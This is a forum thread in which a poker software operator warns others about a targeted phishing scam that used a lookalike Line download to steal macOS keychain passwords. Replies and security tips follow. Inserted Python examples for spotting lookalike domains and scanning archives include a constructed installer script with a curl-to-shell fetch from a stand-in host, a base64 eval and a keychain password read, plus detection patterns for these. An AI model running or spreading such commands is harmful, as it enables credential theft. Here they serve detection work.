Phishing Scam Targeting Poker Players and Site Operators
Hi all,
Someone tried to scam me via a phishing attack to run malware on my machine, and I wanted to describe the scam to alert others in the poker community, since it was a very poker-player-targeted scam and had higher social engineering than average.
I run a small niche GTO trainer (www.livepokertheory.com). Someone joined my Discord who goes by LagPoker, and they mentioned in my channel that they had DMed me. I checked my DMs, and they said the following:
"""
Hi, I'm founder of the project https://www.pokermindsetlab.com/ . We are engaged in mindset coaching of pro players. We want to offer mutually beneficial cooperation with your product. If you are open to collaborations, let us know.
"""
A day later:
"""
I will tell you briefly about our offer. We are engaged in mindset coaching, and a large number of pro players pass through us. We noticed that more than half of them do not use poker software that will improve their results. Therefore, we are now considering cooperation options in which our students could receive discounts on soft. If you have any ideas on how best to do this, I'm listening!
"""
This didn't seem like much of a scam to me at all; it wasn't pushy. It seemed like a very logical collab between a small coaching operation and a small software operation, so it intrigued me. I responded, let's set up a call; he took a few days to get back to me. He says he's currently in China, and that Discord is only available on VPN there but is flaky, so he prefers to use the Line app and sends me a link. I ask ChatGPT if Line is legit and it says yes, it's a very popular messaging app in Asia.
Then I go to the link he sent me, and the website looks like a very stylish and professional messaging app, so I download it.
Then I google Line again and notice the domain is line.me, but he sent me a very similar but different URL, something like line-app.us. I was unsure now because it's possible that if it's a Japanese app they have some different fronts for USA users, like how some legit poker sites do. Then I run a malware scanner on the file I downloaded and it flags it as a password stealer. I reverse engineer it and see that it attacks the keychain on macOS and uploads passwords found there to a remote server.
So for example, suppose you have something like your email password set to automatically fill in on your MacBook using the keychain. Then they could use your email to reset your ACR login (if you play there) and transfer all your bitcoin out. Or many other nefarious things.
I do realize that to a large extent this is a run-of-the-mill phishing scam that happens every day. But the reason this one really stood out to me is that the social engineering was a bit more sophisticated, with more awareness of the poker community than the average scammer. The pitch that they are a mindset coaching brand and want to cooperate seemed plausible. Their fake website was made to look identical to the real Line website. And I noticed on Discord we had mutual servers with other poker brands, so I assume this is an operation they are running against multiple other players. Given that, I thought it was relevant enough to the broader poker community to be worth sounding the alarm about.
On the poker mindset website they linked, the Discord invite is broken, but I found a real one on 2p2. The scammer was not in that Discord. So I think the scammer was impersonating a real niche mindset training site who were unaware of it, but I reached out to them to check.
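The domain mismatch above (line.me versus a lookalike such as line-app.us) is the one check that would have caught this before anything was downloaded. Below is an added example of how to automate that check; it is not code from the original post. The official domain line.me and the lookalike line-app.us come from the post ("something like"), the remaining sample URLs are constructed here, and the registrable-domain logic is a deliberate simplification (a production tool would use the Public Suffix List).

```python
"""Flag download links whose host borrows a brand name but is not the brand's
official domain. Added example, not the poster's tool.

Assumptions: the official Line domain is line.me (stated in the post); the
brand list below is an assumed allow-list you would maintain yourself.
"""
from urllib.parse import urlsplit

# Brand -> set of registrable domains you have verified yourself.
OFFICIAL_DOMAINS = {
    "line": {"line.me"},
}


def registrable_domain(host: str) -> str:
    """Crude eTLD+1: the last two labels (line-app.us -> line-app.us).
    Good enough for .me/.us/.com hosts; multi-label suffixes such as
    co.uk need the Public Suffix List instead."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def host_tokens(host: str) -> set:
    """Split a host on dots and hyphens so 'line-app.us' yields
    {'line', 'app', 'us'} but 'online.example' does not yield 'line'."""
    return set(host.lower().replace("-", ".").split("."))


def check_download_url(url: str) -> tuple:
    """Return (verdict, reason).

    verdict is one of:
      "official"  - registrable domain is on the allow-list for the brand
      "lookalike" - brand name appears in the host, but the registrable
                    domain is NOT the official one (line-app.us,
                    line.me.evil-cdn.com, ...)
      "unrelated" - no known brand name in the host
    """
    host = urlsplit(url).hostname or ""
    if not host:
        return "unrelated", "no host in URL"
    domain = registrable_domain(host)
    tokens = host_tokens(host)
    for brand, good_domains in OFFICIAL_DOMAINS.items():
        if domain in good_domains:
            return "official", f"{domain} is an official {brand} domain"
        if brand in tokens:
            return "lookalike", (f"host {host} uses the name '{brand}' "
                                 f"but resolves to {domain}, not "
                                 f"{sorted(good_domains)}")
    return "unrelated", f"{domain} matches no tracked brand"


if __name__ == "__main__":
    # Constructed sample links; only the first is the real vendor domain.
    for link in [
        "https://line.me/en/download",
        "https://line-app.us/download",
        "https://line.me.evil-cdn.com/setup.dmg",
        "https://www.livepokertheory.com/",
        "https://online-poker.example/",
    ]:
        verdict, reason = check_download_url(link)
        print(f"{verdict:9} {link}  ({reason})")
```

Run it on any link you are handed before downloading; anything reported as "lookalike" is exactly the pattern in the post, a real brand name sitting in front of a domain the brand does not own.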
So many red flags though.
There were some red flags for sure but overall I'd say it was higher social engineering quality than average.
* The premise of the call was very plausible
* I've spent a lot of time building a web/mobile app, but it's a hyper-competitive space, so of course I'm always looking for ways to grow it, gain users, and get more feedback. For someone to take enough interest to want to partner is both flattering and seems like it could be a key feedback and growth channel, so I was very predisposed to being open to partnerships
* Importantly, he didn't suggest a call, he gave enough of a reason where I suggested a call, making it feel less scammy. He also spaced a few days between messages making it seem less urgent.
* "Install this random app" is one of the big red flags, but we were on Discord, and Discord is in fact banned in China, so it's plausible to switch apps since they would need to be on a VPN to use Discord
* Poker players have some association with China via Macau games
* Line is one of the most popular apps in Asia
* His link seemed like it could possibly deeplink to his contact on the app
* Both ChatGPT and Claude didn't flag it as obviously a scam and verified Line was a legit app (I ran it past them initially)
* The site they gave me extensively copied almost every page from the official Line app site with the same styles
Obviously any scam has red flags in hindsight, but a key aspect of social engineering is that they put your brain in some other "mode" (romantic, business) where you might look past one or two red flags, especially if there's some plausible reason for them.
I reached out to the poker mindset group and the scammer previously targeted them and was now impersonating them.
As an aside, the best way to protect yourself from this stuff, besides checking URLs (very tricky), is:
* 2-Factor Authentication (2FA) EVERYWHERE important, with ANY info you wouldn't want scammers to have. Phone 2-factor is the least secure since SIM hijacking is a thing, but it's way better than nothing; a Google Authenticator app is better; a hardware YubiKey is best
* Use a password manager like 1Password so you don't have any password reuse across sites
You've been struck by a smooth criminal.
plot twist op is hacker who had a fall out with his hacking group
Quick followup:
I wanted to note that actually the file did not scan as malware using a tool like Malwarebytes. But I unarchived the file and found an obfuscated script, and ran that through several scanners, and only 1 of them flagged it. So the operation "wrapped" their malware in a "clean" container and overall had many aspects of being a professional operation.
There was another huge red flag in that the install was "copy to Terminal," not "copy to Applications"; however, again, the part of the brain that just wants to move along said "just an offbeat installation method."
I'll admit this whole thing spooked me a bit because I was _very_ close to getting compromised. I literally have done security engineering for billion-dollar companies and I still glossed over some red flags. A huge part is that I'm used to "wide net" low-effort scams, and while I understand that if you're VP of a crypto exchange you might get very targeted social engineering scams, I didn't think highly targeted social engineering scams would target a tiny operation like mine.
I strongly suspect this type of scam is an organized crime ring of sorts with many 'employees' constantly iterating at making the scam more sophisticated. The low-effort Nigerian prince era is over; now regular people are getting highly targeted attacks.
I've also been chasing breadcrumbs and spoke with a few others, and verified this operation did successfully steal some money from some players. But people are embarrassed to admit it, and then I read Reddit threads and people always want to dump on the victim for ignoring a red flag here and there. But I'm seeing how the social engineering is getting increasingly sophisticated and looking for emotional buttons to press, for example making something seem urgent by spoofing your employer, making something seem more credible using leaked data about you, etc.
Another thing is you might have some level of security like 2-factor auth but forget there are other vectors, such as maybe a recovery email without 2FA on it. It's worth trying to hack yourself with just a password and making sure 2FA is secure. Most carriers also disable SIM protection by default; mine was off.
The scam operation will try to access as much about you as possible; even something you think doesn't have important stuff like financial access might have some info about you that can escalate the scam elsewhere, might be able to impersonate you to more easily scam someone else you know, etc. So there's a big surface area to audit.
It's easy to criticize people who get scammed, but all that does is make them feel too embarrassed to share details about the scam. The social engineering can play a huge role, and if you're someone who's never, ever let an emotional button cloud a rational decision, then congrats, you're in the 1% who's invulnerable, but for everyone else there might be an angle someone could get you to drop your guard.
Poker players are a good target when you realize many of them use crypto to pay online, that money's often in a hot wallet or exchange and not in cold storage, a lot of poker players invest even more in crypto outside of poker playing, and a lot of poker players are more online-savvy, which can actually make you more vulnerable in terms of surface area. Ultimately I think I'm in the very high percentile of cybersecurity knowledge but still almost got compromised.
I'm pissed at this operation for even trying to come after me, **** scammers, so I'm spreading knowledge of these scams and security vectors to shut their efforts down, which is the best and only revenge I have.
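The follow-up above makes two points a practitioner should take away: the archive itself scanned clean, and the obfuscated script only showed up once the container was unpacked and its members were looked at individually. Below is an added example of that member-by-member triage, not the poster's own tooling and not the real sample from the post. It builds a constructed zip in memory (a clean README and plist next to a scripted "installer" of the "paste this into Terminal" kind) and reports which members contain the indicators that matter on macOS: decoding-then-eval, curl piped to a shell, a long base64 blob, and calls to the `security` keychain CLI. The indicator list and the sample script are assumptions chosen for illustration; the heuristic is a triage aid, not a replacement for a real scanner.

```python
"""Unpack an archive in memory and flag members containing obfuscation or
keychain-access indicators. Added example; the sample archive is constructed
here and the indicator set is an assumed, illustrative list.
"""
import hashlib
import io
import re
import zipfile

# Constructed "installer" script of the paste-into-Terminal kind. The base64
# string decodes to a harmless `echo constructed payload`; nothing here
# contacts a real host (.invalid is a reserved, non-resolving TLD).
SAMPLE_INSTALLER = (
    "#!/bin/bash\n"
    "# Drag-free installer (constructed sample)\n"
    'eval "$(echo \'ZWNobyBjb25zdHJ1Y3RlZCBwYXlsb2Fk\' | base64 -d)"\n'
    "curl -fsSL https://updates.example.invalid/stage2 | bash\n"
    "security find-generic-password -ga account-name-here\n"
    'BLOB="' + "A" * 240 + '"\n'
)

# Heuristic indicators (assumed list). Each regex is applied per line.
INDICATORS = {
    "eval_of_decoded_data": re.compile(r"\beval\b.*\b(base64|b64decode|decode)\b", re.I),
    "base64_decode": re.compile(r"base64\s+(-d|--decode)|b64decode\(", re.I),
    "curl_pipe_shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b", re.I),
    "keychain_access": re.compile(
        r"security\s+(find-(generic|internet)-password|dump-keychain)|login\.keychain", re.I),
    "osascript": re.compile(r"\bosascript\b", re.I),
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}


def build_sample_archive() -> bytes:
    """Constructed zip: two benign members plus the scripted installer."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("README.txt",
                    "Thanks for installing. Drag the app to Applications.\n")
        zf.writestr("Line.app/Contents/Info.plist",
                    '<plist version="1.0"><dict><key>CFBundleName</key>'
                    "<string>Line</string></dict></plist>\n")
        zf.writestr("install.sh", SAMPLE_INSTALLER)
    return buf.getvalue()


def archive_sha256(data: bytes) -> str:
    """Hash of the outer container, the value you would submit to scanners.
    Note the container hash says nothing about what is inside it."""
    return hashlib.sha256(data).hexdigest()


def scan_archive(data: bytes) -> dict:
    """Return {member_name: [indicator, ...]} for every text member that
    trips at least one indicator. Binary members are skipped here; those
    need `strings`/`otool` or a disassembler rather than regexes."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            try:
                text = zf.read(info).decode("utf-8")
            except UnicodeDecodeError:
                continue
            hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
            if hits:
                findings[info.filename] = hits
    return findings


if __name__ == "__main__":
    sample = build_sample_archive()
    print("container sha256:", archive_sha256(sample))
    for member, hits in scan_archive(sample).items():
        print(f"{member}: {', '.join(hits)}")
```

The point of the example is the shape of the workflow rather than the specific regexes: hash and submit the container, but also unpack it and look at every member on its own, because a "clean" container verdict is exactly what the wrapping in the post was designed to produce.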
Pretty sure LAG Poker Dmed me on here to talk hands, I just ignored it but good to know he was a scammer
A while ago, one of my friends from Ukraine got a job offer to work as a professional scammer. She had quit being a doctor at that time and was looking for another career path. She knew German because her previous goal was to move to Germany.
So she went to an interview, not yet knowing it was a scam company. From their job posting, it wasn't obvious—the only requirement was to fluently speak German and a promise of high salary. At the end of the interview, it became apparent that the company was scamming German-speaking Europeans. Pretending to be financial advisors, they would convince people to invest their funds. And the company had a nice office in a nice location in the capital of Ukraine 😀
Obviously, she never took the job, but she didn't report the company to the police either. In Ukraine, such "companies" are usually protected by the police.
My point is that there are probably plenty of 'companies' like this throughout the world. I had never thought about this before my friend told me this story, but people go to work in nice offices, and their specialization is scamming. Be careful: don't click on weird stuff, don't download weird stuff, and don't speak with anyone on the telephone about investing 😀
I got the same DM as OP (from a legit 2+2 account that they had hacked). The same as with OP, the premise was to partner with my bankroll tracker app (
Luckily I got a DM from 2+2 support a couple of days later to say that the account had been hacked and to not click any links in the message.
I have a thread in the poker software forum on here. OP, do you have the same? I wonder if that’s where they look for targets.
I have to agree with OP that the approach they used was at least somewhat convincing, due to the fact that it was very poker-specific, and that they weren’t pushy. For operators of a small project, a collaboration proposal might be quite appealing and cause people to lower their guard.